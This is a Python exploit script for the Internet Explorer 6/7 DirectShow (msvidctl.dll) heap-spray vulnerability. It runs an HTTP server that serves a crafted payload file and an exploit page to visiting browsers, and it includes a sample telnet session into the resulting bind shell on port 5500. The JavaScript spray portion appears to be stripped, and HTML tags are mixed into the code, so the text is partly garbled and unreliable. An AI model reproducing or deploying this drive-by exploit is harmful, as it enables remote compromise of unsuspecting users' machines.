MS Internet Explorer 6,7 DirectShow (msvidctl.dll) exploit

#!/usr/bin/env python
######################################################################################
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)     #
######################################################################################
#									             #
# Written by SecureState R&D Team 	                                             #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin              #
# http://www.securestate.com				 		             #
#									             #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind        #
#									             #
######################################################################################
# Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7                             #
######################################################################################
#										     #
# This exploit is publicly being exploited in the wild, opted to release this	     #
# to the research community. Microsoft is aware of the vulnerability.		     #
#										     #
######################################################################################
#										     #
# [-] Exploit sent... [-]							     #
# [-] Wait about 30 seconds and attempt to connect.[-]				     #
# [-] Connect to IP Address: 10.211.55.140 and port 5500 [-]		             #
#										     #
# relik@sslinuxvm1:~$ telnet 10.211.55.140 5500					     #
# Trying 10.211.55.140...							     #
# Connected to 10.211.55.140.							     #
# Escape character is '^]'.							     #
# Microsoft Windows [Version 5.2.3790]						     #
# (C) Copyright 1985-2003 Microsoft Corp.					     #
#									             #
# C:\Documents and Settings\Administrator\Desktop>				     #
#										     #
#										     #
# NOTE: The javascript code is not obfuscated in anyway, normal A/V should pick this #
# up. This is intentional.							     #
#										     #
# Improved reliability, appears to be about 95 percent of the time. Adjusted the     #
# spray size a bit.								     #
#										     #
######################################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys,binascii
try:
  import psyco
  psyco.full()
except ImportError:
   pass
class myRequestHandler(BaseHTTPRequestHandler):
 try:
  def do_GET(self):
    # Always Accept GET
    self.printCustomHTTPResponse(200)
    # trigger the overflow *boom*
    if self.path == "/ohn0es.jpg":
       unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00")
       self.wfile.write(unhex)
    if self.path == "/":
        target=self.client_address[0]
        self.wfile.write("""""")
        self.wfile.write("""
        <script type="text/javascript"><!--mce:0--></script>
<div id="DivID">""")
        self.wfile.write("""""")
        self.wfile.write("""<span style="color: white;">
                ###############################################################################
 
MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)
 
Written by SecureState R&amp;D Team
 
Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin
 
http://www.securestate.com
 
win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind
 
Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7
 
###############################################################################
 
""")
        print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target))
  # Print custom HTTP Response
  def printCustomHTTPResponse(self, respcode):
    self.send_response(respcode)
    self.send_header("Content-type", "text/html")
    self.send_header("Server", "myRequestHandler")
    self.end_headers()
 
 # In case of exceptions, pass them
 except Exception:
    pass
 
httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
#####################################################################################
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)    #
#####################################################################################
#                                                                                   #
# Written by SecureState R&amp;D Team                                                   #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin             #
# http://www.securestate.com                                                        #
#                                                                                   #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind       #
#                                                                                   #
#####################################################################################
#        Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7                     #
#####################################################################################
""")
print ("[-] Starting MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray [-]")
print ("[-] Have someone connect to you on port 80 [-]")
print ("\n\nType -c to exit..")
try:
     # handle the connections
     httpd.handle_request()
     # Serve HTTP server forever
     httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
       print ("\n\nExiting exploit...\n\n")
       sys.exit(1)
</span></div>